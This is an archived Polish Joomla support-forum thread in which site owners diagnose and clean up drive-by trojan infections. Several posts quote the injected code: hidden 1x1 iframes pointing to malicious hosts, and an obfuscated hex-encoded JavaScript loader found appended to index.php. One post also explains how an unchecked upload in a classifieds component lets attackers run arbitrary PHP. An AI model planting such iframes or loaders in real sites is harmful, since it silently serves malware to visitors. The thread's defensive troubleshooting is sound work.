PDA

Zobacz pełną wersję : Prośba o pomoc-portal w Joomla zaatakowany



pok
05-08-2006, 08:54
Witam,

mam do Was wielką prośbę. Otóż wczoraj ktoś podpiął nam pod strone "konia trojańskiego" w taki sposób, że jeżeli ktoś wchodzi na strone przez Explorera to wyskakuje mu okienko monitu skryptu i informacja o tym że wykryto konia trojańskiego.Pod Firefoxem wszystko chodzi ok ponieważ jakoś sobie radzi z tym. Podobno ktoś mógł dostać się przez jakąś dziurę w Joomli lub forum. Jeżeli ktoś wie o co chodzi lub mógłby mi jakoś pomóc będę bardzo wdzięczny. Pozdrawiam Adres strony zainfekowanej to www.miastostudentow.pl (http://www.miastostudentow.pl) Mozecie sprawdzić pod Explorerem i Firefoxem

josh
05-08-2006, 09:08
a na kotrej to wersji joomla/ mambo dziala twoj serwis??


widze pod IE Exploit.WMF trojan

pozdr

pok
05-08-2006, 09:12
dokladnie coś takiego:
Joomla! 1.0.7 Stable [ Sunburst ] 15-Jan-2006 20:00 UTC

pok
05-08-2006, 09:23
i jeszcze jedno...moze to bedzie smieszne teraz co napisze, ale jeżeli wejdziesz na strone przez Firefoxa i klkniesz powiedzmy w ikonke działu "Gdzie zjeść" i później pokaże Ci się menu po lewej stronie "Rozrywka" to zaraz pod tym nagłówkiem bedziesz miał taki mały kwadracik (u mnie jest czarny) i jak dasz na niego źródło to bedzie to wygladalo tak iframe src="http://zchxsikpgz.biz/dl/adv521.php" height="1" width="1"></iframe
i to jest właśnie chyba ten syf.
Pozdrawiam i dzieki za tak szybka odpowiedz

Dylek
05-08-2006, 10:46
To nie jest smieszne, co napisales, bo definiuje to rozmiar 1x1 px :)
Jeden z odwiedzajacych nasz serwis znalazl zlosliwy kod w pliku mod_mainmenu.php

pok
05-08-2006, 11:36
a mógłbym prosić o dokładniejszą podpowiedź jak to usunąć i co to za kod. dzwoniłem do home.pl bo tam znajduje się nasz serwis i oni nie wiedzą jak pomóż, ale powiedzieli mi że to najprawdopodobniej przez forum phpbb2 bylo wejście.

Dylek
05-08-2006, 12:05
Kod podales wczesniej, w przypadku znalezionym przez Artura zostal on zmieniony na ciag znakow ASCII i dodany na poczatku pliku mod_mainmenu.php

pok
05-08-2006, 14:27
dzieki piekne za pomoc, wszytsko już powróciło do normalności, bede musial zainstalowac jakieś łaty i chyba usunac forum phpbb2 a pozniej zainstalowac jakies forum z dodatkow joomli.jeszcze raz dziekuje

pomian1
07-08-2006, 17:30
czy dotyczy to również wersji 1.09 PL?

josh
07-08-2006, 21:32
@pomian1 czy dotyczy czy tez nie to jednak bardzo mocno radzilbym pociagnac apgrejdem do 1.0.10

pozdr

Aron
08-08-2006, 11:58
Witam Wszystkich.
Miałem podobny przypadek u mnie i już wyjaśniam gdzie jest dziura.
Otóż problem leży w zabezpieczeniu komponentu com_classfields czyli popularne Ogłoszenia. Przejrzałem logi swojego serwera i już piszę jak dokonano ataku podrzucając kod iframe do mod_mainmenu.
Atakujący wykorzystując dziurę w com_classfields wrzuca sobie jakiś plik (w moim przypadku config.php) na nasz serwer poprzez adresik: /administrator/components/com_classifieds/popups/insert_image.php (sprawdzałem działa bez problemu - można wrzucić co się chce). Następnie odpala to co wrzucił: /components/com_classifieds/adimages/config.php (czyli kod config.php w którym może być wszystko np: modyfikacja Waszego mod_mainmenu.php). Pliku config.php jeszcze nie namierzyłem bo pewnie się sam kasuje po wykonaniu ale jak go dorwę to... Ja miałem dwa ataki z adresu IP: 82.207.99.8 jakby był ktoś zainteresowany zgnębieniem gościa to zapraszam do współpracy coś się wymyśli. Jak narazie jeszcze nie miałem czasu na opracowanie zabezpieczenia (autor pewnie też nie bo sprawdzałem).
Powodzenia w tropieniu dziur. Artur
PS: (dotyczy Lamerów) oczywiście przed podanymi adresami jest http://www.waszastrona.com :)

Rozwiązanie problemu (tymczasowe - uniemożliwia upload plików innych niż graficzne)

Edytujemy plik /administrator/components/com_classfields/popups/ImageManager/images.php podmieniając w nim całą funkcję do_upload() na kod poniżej:

function do_upload($file, $dest_dir,$makeThumb)
{
global $clearUploads;

if(is_file($file['tmp_name']))
{
$tag = ereg_replace(".*\.([^\.]*)$", "\\1", $file['name']); //rozszerzenie pliku
$tag = strtolower($tag); //rozszerzenie na male literki
if($tag == 'jpg' || $tag == 'gif' || $tag == 'png' || $tag == 'bmp' || $tag == 'tif') {
//var_dump($file); echo "DIR:$dest_dir";
move_uploaded_file($file['tmp_name'], $dest_dir.$file['name']);
chmod($dest_dir.$file['name'], 0666);
if ($makeThumb){
$thumbsize=$_POST['thumbSize'];
$thumbQuality=$_POST['thumbQuality'];
$thumbFolder=$_POST['thumbFolder'];
$resizeOpt=$_POST['resizeOpt'];
make_thumb($dest_dir.$file['name'],$thumbsize,$thumbQuality,$thumbFolder,$resizeOpt) ;
}
}
else {
echo '<SCRIPT>alert(\'This file format is not allowed !\')</SCRIPT>';
}
}
Powodzenia

joombo
12-10-2006, 00:28
U mnie wszedł prawdopodobnie także poprzez classifields. Naniosłem wskazaną poprawkę.

Trojan działał w ten sposób - dopisał taką linijkę kodu we wstępie do artykułu



<iframe src="http:// 72.21.44.34 /~ack/get.php?f=http://www.egzorcyzmy.katolik.pl/" width=1 height=1 style="visibility:hidden"></iframe>

Chętnie dorwę pajaca :)

PRzeszukałem zawartość bazy pod kątem ip 72.21.44.34 i usunąłem ten kod z artykułu (tabela jos_content). Dodatkowo znalazłem ten ip w tabeli mos_jstats_ipaddresses (statystyki)
nslookup 72.21.44.34 epsilon.xmastershost.com us

CNK
13-12-2007, 23:57
a ja mam taki problem, a dokładnie z jakiegoś rosyjskiego adresu IP: 77.221.133.188. Kasperski wyświetla komunikat:

Koń trojański:
Trojan-Clicker.HTML.IFrame.fp


Plik: http://77.221.133.188/.if/go.html?1495741d86a30891

gdy szukam tego adresu w bazie czy w plikach strony to nic nie ma, nadpisanie plików pomaga na jakiś czas a kilka godzin później znów to samo.. :/

znalazłem coś o tym tu: http://forum.joomla.org/index.php?topic=241119.msg1107618
lecz tam tylko doradzili instalacje wszystkiego od nowa..

joombo
14-12-2007, 22:37
Po pierwsze poszukaj w bazie nie adresu strony, ale kodu: iframe. Drugie, to poda j wersję joomli i liste komponentów. Do minie ten śmieć dostał sie prawdopodobnie przez ruski komponent classifields. Ten komponent ogłoszeń ma* dziurę taką, że da się załadować nie tylko obrazek, ale i skrypt, a potem może sobie to ktoś elegancko i zdalnie uruchomić. Na tę dziurę była jakas łatka (sprawdzająca, czy plik wczytywany jest w formacie grafiki), ale to była łatka nieoficjalna.

*wersja 1.4, przynajniej do niedawna ostatnia i nie rozwijana

CNK
15-12-2007, 10:40
wersja joomli 1.0.13 (wcześniej nic takiego nie miałem)
lista komponentów:
1) ARTIO JoomSEF
2) Banners (domyślnie jest w joomli)
3) Joomla-Przemo 1.2
4) Komentarze :: AkoComment 1.4.6
5) Mass Mail (domyślnie)
6) News Feeds (domyślnie w każdej Joomli)
7) Polls (j.w.)
8) Syndicate (j.w)
9) Web Links (j.w.)

To tyle z komponentów.

"iframe" w bazie Joomli też nie ma

Edit:
dodam jeszcze, że wcześniej nie miałem artio sef, ani akocomments tweaked.. jakieś 2 dni temu, i tak samo wyskakiwał komunikat z trojanem..

w pliku index.php i login.php dodaje się na końcu kod:

<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4763452669b07(v4763452669eed){ return(parseInt(v4763452669eed,16));}function v476345266aab8(v476345266aeb6){ var v476345266b28e='';for(v476345266b686=0; v476345266b686<v476345266aeb6.length; v476345266b686+=2){ v476345266b28e+=(String.fromCharCode(v4763452669b0 7(v476345266aeb6.substr(v476345266b686, 2))));}return v476345266b28e;} document.write(v476345266aab8('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D632 07372633D5C27687474703A2F2F37372E3232312E3133332E3 138382F2E69662F676F2E68746D6C3F272B4D6174682E726F7 56E64284D6174682E72616E646F6D28292A313836303832292 B273139653466353236613938655C272077696474683D34343 2206865696768743D343231207374796C653D5C27646973706 C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5 343524950543E'));</script>ale jak to nie mam zielonego pojęcia z czego wywala ten kod..

ale nawet jak usunę ten kod z tych 2 plików, to kasperski dalej informuje o trojanie na stronie.. czyli jest to jeszcze gdzieś..

joombo
15-12-2007, 18:09
A wszystko w porządku z uprawnieniami do katalogów/plików i htaccess? Do tego - jest metoda na zablokowanie wybranego ip z uzyciem htaccess - poszperaj na forum, a znajdziesz.

CNK
21-12-2007, 20:23
tak, znalazłem tu gdzieś liste z IP do zbanowania + zablokowałem ten 77.221.133.188, zainstalowałem Joomle od nowa ale pod innym prefiksem (pliki wgrane od nowa są bez kodu), później usunąłem z bazy nowo utworzone wpisy i stary config wrzuciłem :)

Jak na razie wszystko ok :D

inkos
13-01-2008, 23:34
tak, znalazłem tu gdzieś liste z IP do zbanowania + zablokowałem ten 77.221.133.188, zainstalowałem Joomle od nowa ale pod innym prefiksem (pliki wgrane od nowa są bez kodu), później usunąłem z bazy nowo utworzone wpisy i stary config wrzuciłem :)

Jak na razie wszystko ok :D
Dla pewności zmień jeszcze hasła dostępowe do konta FTP na jakim masz Joomle.